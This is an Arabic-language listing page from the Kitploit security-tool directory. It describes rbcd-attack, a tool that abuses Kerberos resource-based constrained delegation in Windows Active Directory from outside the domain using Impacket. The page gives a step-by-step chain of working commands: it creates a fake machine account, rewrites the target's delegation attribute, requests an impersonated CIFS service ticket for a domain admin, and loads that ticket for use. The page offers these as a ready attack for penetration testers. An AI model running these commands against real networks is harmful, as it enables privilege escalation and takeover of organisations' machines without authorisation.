Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
rbcd-attack — هجوم Kerberos للتفويض المقيد القائم على الموارد من الخارج باستخدام Impacket | Kitploit
أدوات/GitHubGitHub/tothi/rbcd-attack
تصعيد الامتيازاتالاستغلالاختبار الاختراق
GitHubtothi/rbcd-attack

rbcd-attack

هجوم Kerberos للتفويض المقيد القائم على الموارد من الخارج باستخدام Impacket

عرض المستودع
64672منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إساءة استخدام تفويض Kerberos المقيد القائم على الموارد

الملخص التنفيذي

هذا المستودع يتعلق بهجوم عملي ضد تفويض Kerberos المقيد القائم على الموارد في مجال ويندوز Active Directory.

الفرق عن التطبيقات الأخرى الشائعة هو أننا نشن الهجوم من خارج مجال ويندوز، وليس من جهاز كمبيوتر منضم للمجال (عادة ما يكون ويندوز).

يتم تنفيذ الهجوم باستخدام Python3 Impacket فقط (وتوابعه). تم اختباره على Arch مع أحدث إصدار من Impacket (0.9.21 وقت الكتابة).

سجل الهجوم

الهجوم

باختصار، دون تفاصيل عميقة، يستهدف الهجوم كمبيوترًا في المجال، وتحديدًا مبادئ خدمة متعلقة بكمبيوتر المجال الهدف.

ما نحتاجه هنا كمتطلبات مسبقة:

  • حساب مجال لديه صلاحية الوصول للكتابة على الكمبيوتر الهدف (بالضبط صلاحية الكتابة على خاصية msDS-AllowedToActOnBehalfOfOtherIdentity لكائن الكمبيوتر الهدف في المجال)
  • الإذن بإنشاء حسابات كمبيوتر جديدة (هذا افتراضي عادةً، انظر MachineAccountQuota)
  • الوصول إلى وحدة التحكم بالمجال عبر LDAP (389/tcp) و SAMR (445/tcp) (أو LDAPS (636/tcp))
  • الوصول إلى Kerberos (88/tcp) إلى وحدة التحكم بالمجال

مسار الهجوم بمستوى عالٍ جدًا:

  1. إنشاء كمبيوتر وهمي
  2. إساءة استخدام خاصية msDS-AllowedToActOnBehalfOfOtherIdentity الخاصة بالهدف
  3. طلب تذاكر خدمة منتحلة (S4U) للكمبيوتر الهدف

الفائدة:

  • قد تسمح تذاكر الخدمة المنتحلة بالوصول عالي المستوى إلى الخدمات على الهدف مثل CIFS، HTTP، إلخ، إذا كان للحساب المنتحل امتيازات. أحيانًا السيطرة الكاملة على الكمبيوتر.

الأدوات الشائعة

تعمل الأدوات الشائعة لهذا الهجوم على جهاز ويندوز منضم للمجال باستخدام:

  • Powermad لإضافة حسابات كمبيوتر جديدة
  • Powerview من فرع التطوير لـ PowerSploit لـ إساءة استخدام msDS-AllowedToActOnBehalfOfOtherIdentity
  • Rubeus لعمليات تذاكر S4U

تنفيذ باستخدام Impacket

يستخدم هذا التنفيذ Impacket الخالص من خارج المجال.

إنشاء الكمبيوتر الوهمي

باستخدام مثال addcomputer.py من Impacket، لننشئ كمبيوترًا وهميًا (اسمه evilcomputer):

root@kitploit:~
addcomputer.py -computer-name 'evilcomputer$' -computer-pass ev1lP@sS -dc-ip 192.168.33.203 ecorp.local/test:ohW9Lie0

تعديل حقوق التفويض

تم تطوير النص rbcd.py الموجود هنا في المستودع والذي يضيف واصف الأمان المرتبط بالكمبيوتر الوهمي EVILCOMPUTER المنشأ حديثًا إلى خاصية msDS-AllowedToActOnBehalfOfOtherIdentity للكمبيوتر الهدف.

root@kitploit:~
./rbcd.py -f EVILCOMPUTER -t WEB -dc-ip 192.168.33.203 ecorp\\test:ohW9Lie0

يستخدم النص بشكل كبير فئات بايثون الموجودة في مثال ntlmrelayx.py الخاص بـ Impacket. للحصول على المساعدة ومثال، قم باستدعاء النص بدون خيارات.

الحصول على تذكرة الخدمة المنتحلة

الآن كل شيء جاهز لإساءة استخدام التفويض المقيد عن طريق استعلام S4U2Self والحصول على تذكرة خدمة منتحلة للكمبيوتر الهدف. باستخدام نص مثال getST.py من Impacket:

root@kitploit:~
getST.py -spn cifs/WEB.ecorp.local -impersonate admin -dc-ip 192.168.33.203 ecorp.local/EVILCOMPUTER$:ev1lP@sS

الأمر أعلاه يجلب تذكرة خدمة CIFS نيابة عن مستخدم المجال المستهدف admin ويخزنها في الملف admin.ccache.

بعد إضافة مسار الملف إلى متغير KRB5CCNAME تصبح التذكرة قابلة للاستخدام لعملاء Kerberos.

root@kitploit:~
export KRB5CCNAME=`pwd`/admin.ccache
klist

المراجع

للحصول على تفاصيل حول إساءة استخدام التفويض المقيد القائم على الموارد:

  • https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
  • https://www.harmj0y.net/blog/activedirectory/a-case-study-in-wagging-the-dog-computer-takeover/
  • http://www.harmj0y.net/blog/activedirectory/s4u2pwnage/

وواحدة من أكثر العروض التقديمية شمولاً حول هجمات Kerberos:

  • شرائح بناء هجمات Kerberos باستخدام بدائيات التفويض في Defcon بواسطة Elad Shamir و Matt Bush
تنزيل الأداة